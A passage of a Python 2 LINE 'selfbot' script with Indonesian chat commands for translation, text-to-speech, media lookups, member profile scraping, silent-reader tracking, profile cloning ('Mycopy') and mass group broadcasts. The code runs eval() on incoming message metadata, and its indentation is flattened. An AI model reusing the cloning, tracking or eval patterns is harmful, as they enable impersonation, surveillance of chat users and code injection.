elif msg.text in ["Urlpict"]:
h = kr1.getContact(mid)
kr1.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif msg.text in ["Mycover"]:
h = kr1.getContact(mid)
cu = kr1.channel.getCover(mid)
path = str(cu)
kr1.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = kr1.getContact(mid)
cu = kr1.channel.getCover(mid)
path = str(cu)
kr1.sendText(msg.to, path)
#==========================[WIB]===========================
elif msg.text in ["Intip on","intip on"]:
if msg.from_ in admin:
try:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
wait["Sider"] == True
kr1.sendText(msg.to,"Cek yang ngintip on..!!!")
elif msg.text in ["Intip off","intip off"]:
if msg.from_ in admin:
if msg.to in cctv['point']:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
kr1.sendText(msg.to,"Cek yang ngintip off")
else:
kr1.sendText(msg.to,"Belum Di Set Boss")
#==========================[WIB]===========================
elif msg.text in ["Ciduk on","toong on"]:
#if msg.from_ in admin:
try:
del ngintip['target'][msg.to]
del ngintip['toong'][msg.to]
del ngintip['intip'][msg.to]
except:
pass
ngintip['target'][msg.to] = msg.id
ngintip['toong'][msg.to] = ""
ngintip['intip'][msg.to]=True
wait["intipp"] == True
kr1.sendText(msg.to,"Cek yang Cctv on..!!!")
elif msg.text in ["Ciduk off","toong off"]:
#if msg.from_ in admin:
if msg.to in ngintip['target']:
ngintip['intip'][msg.to]=False
wait["intipp"] = False
kr1.sendText(msg.to,"Cek yang Cctv off")
else:
kr1.sendText(msg.to,"Belum Di Set Boss")
#==========================[WIB]===========================
elif "Getmid @" in msg.text:
#if msg.from_ in admin:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
kr1.sendText(msg.to, g.mid)
else:
pass
elif "Getinfo" in msg.text:
#if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr1.getContact(key1)
cu = kr1.channel.getCover(key1)
try:
kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
#if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr1.getContact(key1)
cu = kr1.channel.getCover(key1)
try:
kr1.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
kr1.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Getname" in msg.text:
#if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr1.getContact(key1)
cu = kr1.channel.getCover(key1)
try:
kr1.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
kr1.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
#if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = kr1.getContact(key1)
cu = kr1.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr1.sendText(msg.to,"Profile Picture " + contact.displayName)
kr1.sendImageWithURL(msg.to,image)
kr1.sendText(msg.to,"Cover " + contact.displayName)
kr1.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
#if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = kr1.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
kr1.sendMessage(msg)
elif "Getpict @" in msg.text:
#if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr1.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr1.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getvid @" in msg.text:
#if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr1.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr1.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Picturl @" in msg.text:
#if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr1.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
kr1.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcover @" in msg.text:
#if msg.from_ in admin:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr1.getContact(target)
cu = kr1.channel.getCover(target)
path = str(cu)
kr1.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Coverurl @" in msg.text:
#if msg.from_ in admin:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = kr1.getContact(target)
cu = kr1.channel.getCover(target)
path = str(cu)
kr1.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Getgrup image" in msg.text:
#if msg.from_ in admin:
group = kr1.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
kr1.sendImageWithURL(msg.to,path)
elif "Urlgrup image" in msg.text:
#if msg.from_ in admin:
group = kr1.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
kr1.sendText(msg.to,path)
#==========================[WIB]===========================
elif "Mycopy @" in msg.text:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
kr1.CloneContactProfile(target)
kr1.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybackup","mybackup"]:
if msg.from_ in admin:
try:
kr1.updateDisplayPicture(backup.pictureStatus)
kr1.updateProfile(backup)
kr1.sendText(msg.to, "Refreshed.")
except Exception as e:
kr1.sendText(msg.to, str(e))
#==============================================================================#
elif "Testext: " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Testext: ", "")
kr1.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
#==========================[WIB]===========================
elif "Translate-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif "Translate-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif "Translate-ar" in msg.text:
isi = msg.text.replace("Tr-ar ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif "Translate-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif "Translate-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
kr1.sendText(msg.to, A)
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
kr1.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
#==========================[WIB]===========================
elif msg.text in ["welcome","Welcome","kam","Kam"]:
ginfo = kr1.getGroup(msg.to)
kr1.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name))
kr1.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
tts = gTTS(text=jawaban1, lang='id')
tts.save('tts.mp3')
kr1.sendAudio(msg.to,'tts.mp3')
#==========================[WIB]===========================
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr1.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr1.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr1.sendAudio(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr1.sendAudio(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
kr1.sendAudio(msg.to,"hasil.mp3")
#==========================[WIB]===========================
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
kr1.sendAudio(msg.to,'tts.mp3')
kr1.sendText(msg.to,jawaban)
kr2.sendText(msg.to,jawaban)
kr2.sendText(msg.to,jawaban)
#==========================[WIB]===========================
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
kr1.sendAudio(msg.to,'tts.mp3')
kr1.sendText(msg.to,jawaban)
kr2.sendText(msg.to,jawaban)
kr2.sendText(msg.to,jawaban)
#==========================[WIB]===========================
elif msg.text in ["Nah","nah"]:
kr1.sendText(msg.to,"Kan")
kr1.sendText(msg.to,"Kan")
kr1.sendText(msg.to,"Kan")
#==========================[WIB]===========================
elif msg.text in ["Absen","absen"]:
if msg.from_ in admin:
kr1.sendText(msg.to,"👉★★★√")
kr2.sendText(msg.to,"👉★★★★√")
kr3.sendText(msg.to,"👉★★★★★√")
kr1.sendText(msg.to,"👉Semua Hadir Boss...!!!")
#==========================[WIB]===========================
elif "Bcast " in msg.text:
if msg.from_ in owner:
bc = msg.text.replace("Bcast ","")
gid = kr1.getGroupIdsJoined()
for i in gid:
kr1.sendText(i,"●▬▬▬▬ஜ۩[BROADCAST]۩ஜ▬▬▬▬●\n\n"+bc+"\n\n#BROADCAST!!")
#==========================[WIB]===========================
elif 'Youtube ' in msg.text:
#if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Youtube ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class': 'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
kr1.sendVideoWithURL(msg.to, ght)
except:
kr1.sendText(msg.to, "Could not find it")
elif "Yt " in msg.text:
#if msg.from_ in admin:
query = msg.text.replace("Yt ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
kr1.sendText(msg.to,hasil)
print '[Command] Youtube Search'
#==========================[WIB]===========================
elif "Lirik " in msg.text:
#if msg.from_ in admin:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
kr1.sendText(msg.to, hasil)
except Exception as wak:
kr1.sendText(msg.to, str(wak))
#==========================[WIB]===========================
elif "Wikipedia " in msg.text:
#if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
kr1.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
kr1.sendText(msg.to, pesan)
except Exception as e:
kr1.sendText(msg.to, str(e))
#==========================[WIB]===========================
elif "Music " in msg.text:
#if msg.from_ in admin:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
kr1.sendText(msg.to, hasil)
kr1.sendText(msg.to, "Please Wait for audio...")
kr1.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
kr1.sendText(msg.to, str(njer))
#==========================[WIB]===========================
elif "Image " in msg.text:
#if msg.from_ in admin:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr1.sendImageWithURL(msg.to,path)
except:
pass
#==========================[WIB]===========================
elif "Instagram " in msg.text:
#if msg.from_ in admin:
try:
instagram = msg.text.replace("Instagram ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
kr1.sendImageWithURL(msg.to, profileIG)
kr1.sendText(msg.to, str(text))
except Exception as e:
kr1.sendText(msg.to, str(e))
#==========================[WIB]===========================
elif "Kelahiran " in msg.text:
#if msg.from_ in admin:
tanggal = msg.text.replace("Kelahiran ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
kr1.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
#==========================[WIB]===========================
elif msg.text in ["Kalender"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
kr1.sendText(msg.to, rst)
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif msg.text in ["ifconfig"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
kr1.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text in ["system"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
kr1.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text in ["kernel"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
kr1.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text in ["cpu"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
kr1.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
#==========================[WIB]===========================
elif "Restart" in msg.text:
if msg.from_ in owner:
print "[Command]Restart"
try:
kr1.sendText(msg.to,"Restarting...")
kr1.sendText(msg.to,"Restart Success")
restart_program()
except:
kr1.sendText(msg.to,"Please wait")
restart_program()
pass
#==========================[WIB]===========================
elif "Kr turn off" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==========================[WIB]===========================
elif msg.text in ["runtime","Runtime"]:
if msg.from_ in admin:
eltime = time.time() - mulai
van = "【ωเɓ-ɓσƭ ૨µɳเɳɠ】\n🔹️ ɓσƭ เร αℓ૨εα∂ყ ૨µɳเɳɠ ƒσ૨:\n"+waktu(eltime)
kr1.sendText(msg.to,van)
#==========================[WIB]===========================
elif msg.text in ["Wib kemari"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in owner:
gid = kr1.getGroupIdsJoined()
gid = kr2.getGroupIdsJoined()
gid = kr3.getGroupIdsJoined()
for i in gid:
kr1.sendText(i,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh Owner Bots...!!!\nMakasih...!!!")
kr1.leaveGroup(i)
kr2.leaveGroup(i)
kr3.leaveGroup(i)
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh Owner Bots...!!!\nMakasih...!!!")
else:
kr1.sendText(msg.to,"He declined all invitations")
#==========================[WIB]===========================
#==========================[WIB]===========================
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u0710a42a75e0a476ad687639db8c069c"}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif "Friendpp: " in msg.text:
if msg.from_ in admin:
suf = msg.text.replace('friendpp: ','')
gid = kr1.getAllContactIds()
for i in gid:
h = kr1.getContact(i).displayName
gna = kr1.getContact(i)
if h == suf:
kr1.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
#==========================[WIB]===========================
elif "Checkmid: " in msg.text:
if msg.from_ in admin:
saya = msg.text.replace("Checkmid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
kr1.sendMessage(msg)
contact = kr1.getContact(saya)
cu = kr1.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
kr1.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
kr1.sendText(msg.to,"Profile Picture " + contact.displayName)
kr1.sendImageWithURL(msg.to,image)
kr1.sendText(msg.to,"Cover " + contact.displayName)
kr1.sendImageWithURL(msg.to,path)
except:
pass
#==========================[WIB]===========================
elif "Checkid: " in msg.text:
if msg.from_ in admin:
saya = msg.text.replace("Checkid: ","")
gid = kr1.getGroupIdsJoined()
for i in gid:
h = kr1.getGroup(i).id
group = kr1.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
